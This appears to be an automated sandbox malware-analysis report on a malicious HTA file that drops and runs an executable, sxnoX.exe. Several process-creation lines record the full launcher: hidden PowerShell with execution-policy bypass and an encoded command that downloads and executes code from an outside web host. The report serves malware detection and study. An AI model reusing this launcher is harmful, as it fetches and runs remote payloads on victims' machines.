Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001F4330	4_2_001F4330
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CA350	4_2_001CA350
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CE360	4_2_001CE360
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DE450	4_2_001DE450
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C8490	4_2_001C8490
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001EA4F0	4_2_001EA4F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D4510	4_2_001D4510
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FC530	4_2_001FC530
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0019A520	4_2_0019A520
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CA520	4_2_001CA520
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00172080	4_2_00172080
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DA600	4_2_001DA600
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E6600	4_2_001E6600
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DE620	4_2_001DE620
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00202644	4_2_00202644
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CA6D0	4_2_001CA6D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001807F0	4_2_001807F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D87E0	4_2_001D87E0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001EC810	4_2_001EC810
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00168920	4_2_00168920
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DE960	4_2_001DE960
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001EE980	4_2_001EE980
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0017AA50	4_2_0017AA50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00206A9B	4_2_00206A9B
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001F0AC0	4_2_001F0AC0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FAAE0	4_2_001FAAE0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C8B10	4_2_001C8B10
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DEB50	4_2_001DEB50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E6B40	4_2_001E6B40
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00170C10	4_2_00170C10
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C2D00	4_2_001C2D00
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E6D70	4_2_001E6D70
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E8E50	4_2_001E8E50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E4EB0	4_2_001E4EB0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001B8EA0	4_2_001B8EA0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DEEE0	4_2_001DEEE0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0016D000	4_2_0016D000
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E7000	4_2_001E7000
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CD060	4_2_001CD060
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00161130	4_2_00161130
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CB180	4_2_001CB180
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0019B280	4_2_0019B280
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001B53C0	4_2_001B53C0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FF3F0	4_2_001FF3F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FB3F0	4_2_001FB3F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00165400	4_2_00165400
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DD400	4_2_001DD400
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00203417	4_2_00203417
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00167490	4_2_00167490
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FD480	4_2_001FD480
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DD600	4_2_001DD600
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E5650	4_2_001E5650
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CD6C0	4_2_001CD6C0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FD710	4_2_001FD710
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001ED770	4_2_001ED770
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DD780	4_2_001DD780
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D97A0	4_2_001D97A0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0016B8D0	4_2_0016B8D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C98F0	4_2_001C98F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DD970	4_2_001DD970
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CB9F0	4_2_001CB9F0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C9A30	4_2_001C9A30
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DFAD0	4_2_001DFAD0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DDB80	4_2_001DDB80
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CFC70	4_2_001CFC70
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D9C8E	4_2_001D9C8E
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CBCC0	4_2_001CBCC0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C3CF0	4_2_001C3CF0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001BDD10	4_2_001BDD10
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00189D00	4_2_00189D00
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00179D50	4_2_00179D50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DDD40	4_2_001DDD40
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D9D74	4_2_001D9D74
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00169D80	4_2_00169D80
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0016FDB0	4_2_0016FDB0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D9DD2	4_2_001D9DD2
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E9E30	4_2_001E9E30
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00161E56	4_2_00161E56
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0021FE5F	4_2_0021FE5F
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FBEB0	4_2_001FBEB0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00203F3C	4_2_00203F3C
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DDF20	4_2_001DDF20
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00181F80	4_2_00181F80

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00198880 appears 382 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001A8CA0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00198E30 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001C88E0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001A8760 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001994D0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001851E0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001A95A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001C7220 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 0020DB03 appears 668 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001C9770 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00193B40 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 0019EA00 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00211470 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00166A00 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001C7210 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001FEDF0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 00193A70 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: String function: 001A88B0 appears 87 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sxnoX.exe 13D499124F676B7D0E326C36A6AF6D9968E8EB6B66F98FCEFB166EAE22149B7C

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\client_1.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\sxnoX.exe "C:\Users\user\AppData\Local\Temp\sxnoX.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\sxnoX.exe "C:\Users\user\AppData\Local\Temp\sxnoX.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx5dca4z.5a2.ps1

Jump to behavior

Source: classification engine

Classification label: mal80.spyw.evad.winHTA@8/4@2/2

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_001843C0 CoCreateInstance,

4_2_001843C0

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0019CEE0 FormatMessageA,_strlen,GetLastError,

4_2_0019CEE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\faf93f57aa8c4c5dddd9cd0de441d5a1\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0016B240 FindResourceA,

4_2_0016B240

Source: sxnoX.exe	String found in binary or memory: config-serial-stopbits
Source: sxnoX.exe	String found in binary or memory: source-address
Source: sxnoX.exe	String found in binary or memory: config-address-family
Source: sxnoX.exe	String found in binary or memory: config-ssh-portfwd-address-family

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Window detected: Number of UI elements: 20

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_079DBC8F push 8B078A7Bh; iretd	3_2_079DBC9B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_079D28B0 pushfd ; retf	3_2_079D28B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08205818 push cs; ret	3_2_082057B3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0820CA90 pushfd ; iretd	3_2_0820CA9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F05E1 push eax; ret	3_2_085F05E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0860D9B9 push FFFFFF8Bh; retf	3_2_0860D9E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08606D8D push 00000029h; retf	3_2_08606D94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0860FF32 push dword ptr [esp+ebx-75h]; iretd	3_2_0860FF36
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08661ABB push esp; retf	3_2_08661AC1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08662D70 push 00000008h; ret	3_2_08662D80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0871B0D8 push eax; mov dword ptr [esp], edx	3_2_0871B1BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0873484D push C36990B4h; ret	3_2_087348C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08730FE1 push FFFFFFC3h; ret	3_2_08730FFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087351B0 push C36990ABh; ret	3_2_087351C8
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0021A0A3 push ecx; ret	4_2_0021A0B6

Source: sxnoX.exe.3.dr	Static PE information: section name: .00cfg
Source: sxnoX.exe.3.dr	Static PE information: section name: .voltbl

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00168280 IsIconic,SetWindowTextW,SetWindowTextA,	4_2_00168280
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00168330 IsIconic,SetWindowTextW,SetWindowTextA,	4_2_00168330
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001683E0 IsIconic,ShowWindow,	4_2_001683E0

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_00164740 RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA,

4_2_00164740

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
